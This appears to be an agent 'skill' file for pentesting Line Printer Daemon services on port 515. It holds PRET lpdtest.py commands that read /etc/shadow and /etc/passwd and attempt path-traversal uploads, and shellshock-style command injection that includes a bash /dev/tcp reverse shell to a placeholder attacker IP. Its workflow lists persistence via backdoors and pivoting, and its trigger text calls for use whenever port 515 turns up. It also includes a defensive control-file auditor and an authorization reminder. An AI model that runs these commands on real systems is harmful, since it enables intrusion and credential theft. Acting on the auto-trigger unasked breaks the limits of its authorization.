Hacktricks-skills lpd-pentesting

How to pentest Line Printer Daemon (LPD) services on port 515/tcp. Use this skill whenever you need to assess printer security, test LPD/LPRng implementations, enumerate printer services, or exploit LPD vulnerabilities. Trigger this skill for any task involving port 515, printer exploitation, LPRng testing, network printer security assessments, or when you discover an LPD service during reconnaissance.

Install (clone the upstream repo):
git clone https://github.com/abelrguezr/hacktricks-skills
Manifest: skills/network-services-pentesting/515-pentesting-line-printer-daemon-lpd/SKILL.MD

LPD Pentesting Skill

A comprehensive guide for pentesting Line Printer Daemon (LPD) services.

What is LPD?

The Line Printer Daemon (LPD) protocol operates on port 515/tcp and was developed in Berkeley Unix in the 1980s (RFC 1179). It uses the lpr command and works by sending:

  • Control file: Specifies job details and user information
  • Data file: Contains the actual print information

Common implementations include LPRng on Unix-like systems.

Why LPD is Vulnerable

LPD can be exploited through:

  • Malicious PostScript injection
  • PJL (Printer Job Language) command injection
  • File operations (upload/download/delete)
  • Command execution via crafted print jobs
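
A defensive counterpart to the list above, as an added example (not code from the original page or from PRET): a Python audit of an RFC 1179 control file, the part of a job that carries job details and user information. It assumes the techniques listed show up as off-spec control-file operands; audit_control_file and both sample jobs are hypothetical and constructed.

```python
import re

# RFC 1179 control-file commands whose operand names a data file to print or unlink.
FILE_CMDS = set("cdfglnoprtvU")
# RFC 1179 data file names: "dfA" + three-digit job number + host name.
DATA_NAME = re.compile(r"df[A-Za-z]\d{3}[A-Za-z0-9._-]+")
# H (host) and P (user) are at most 31 octets; M is described as a user name.
SIMPLE_NAME = re.compile(r"[A-Za-z0-9._-]{1,31}")
# The '() {' prefix used in this page's command injection examples.
FUNC_PREFIX = re.compile(r"\(\)\s*\{")


def audit_control_file(raw: bytes) -> list:
    """Return (line_no, command, reason) for each off-spec control-file line."""
    findings = []
    for no, line in enumerate(raw.decode("latin-1").split("\n"), 1):
        if not line:
            continue
        cmd, operand = line[0], line[1:]
        if FUNC_PREFIX.search(operand):
            findings.append((no, cmd, "shell function-definition prefix in operand"))
        elif cmd in "HPM" and not SIMPLE_NAME.fullmatch(operand):
            findings.append((no, cmd, "host/user operand is not a plain name"))
        elif cmd in FILE_CMDS and not DATA_NAME.fullmatch(operand):
            findings.append((no, cmd, "file operand is not a spool data file name"))
    return findings


# Constructed samples (not captured traffic). BENIGN is a typical lpr job;
# SUSPECT reuses the placeholder strings from this page's lpdtest.py examples.
BENIGN = b"Hws01\nPalice\nJreport.txt\nldfA042ws01\nUdfA042ws01\nNreport.txt\n"
SUSPECT = (
    b"Hws01\n"
    b"P() {:;}; <command>\n"
    b"Malice@mail.example\n"
    b"f/etc/passwd\n"
    b"U../../etc/passwd\n"
)

if __name__ == "__main__":
    for name, sample in (("benign", BENIGN), ("suspect", SUSPECT)):
        print(name)
        for finding in audit_control_file(sample):
            print("  line %d %s: %s" % finding)
```

The same checks can run in a spooler front end or over control files left in the spool directory; the allowed-character sets are deliberately strict and may need widening for a site's naming scheme.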

Tools

PRET (Printer Exploitation Toolkit)

PRET provides two essential tools for LPD interaction. Install from: https://github.com/RUB-NDS/PRET

lpdprint.py - Print files to LPD printers

lpdprint.py <hostname> <filename>

lpdtest.py - Test and interact with LPD printers

# Download a file from the printer
lpdtest.py <hostname> get <path>

# Upload a file to the printer (put takes a single path argument)
lpdtest.py <hostname> put <path>

# Delete a file from the printer
lpdtest.py <hostname> rm <path>

# Command injection
lpdtest.py <hostname> in '() {:;}; <command>'

# Send mail through the printer
lpdtest.py <hostname> mail <email>

Common Exploitation Techniques

1. File Enumeration

Try to read sensitive files from the printer:

# Try to read sensitive files
lpdtest.py <target> get /etc/passwd
lpdtest.py <target> get /etc/shadow
lpdtest.py <target> get /etc/hosts

2. File Upload

Upload malicious files or reverse shells:

# Upload malicious files (put takes a single path argument)
lpdtest.py <target> put <path>

# Path traversal attempts
lpdtest.py <target> put ../../etc/passwd

3. Command Injection

Execute commands via LPD:

# Basic command injection
lpdtest.py <target> in '() {:;}; <command>'

# Example: ping for out-of-band confirmation
lpdtest.py <target> in '() {:;}; ping -c1 <your_ip>'

# Example: reverse shell
lpdtest.py <target> in '() {:;}; bash -i >& /dev/tcp/<your_ip>/<port> 0>&1'

4. Out-of-Band Communication

Send data via mail command:

# Send data via mail command
lpdtest.py <target> mail <your_email>

Finding LPD Services

Shodan Search

port:515

Nmap Scan

# Basic port scan
nmap -p 515 <target>

# With service detection
nmap -sV -p 515 <target>

# With scripts
nmap --script lpd-enum -p 515 <target>

Workflow

  1. Reconnaissance: Identify LPD services via port scanning or Shodan
  2. Enumeration: Use lpdtest.py to probe for accessible files
  3. Exploitation: Attempt command injection or file operations
  4. Persistence: Upload backdoors or modify printer configurations
  5. Pivot: Use printer as a pivot point to internal networks

Safety Considerations

  • Only test systems you have authorization to assess
  • LPD exploitation can cause printer malfunctions
  • Some operations may be logged and trigger alerts
  • Document all findings for reporting
  • Be aware that some printers may have additional security measures
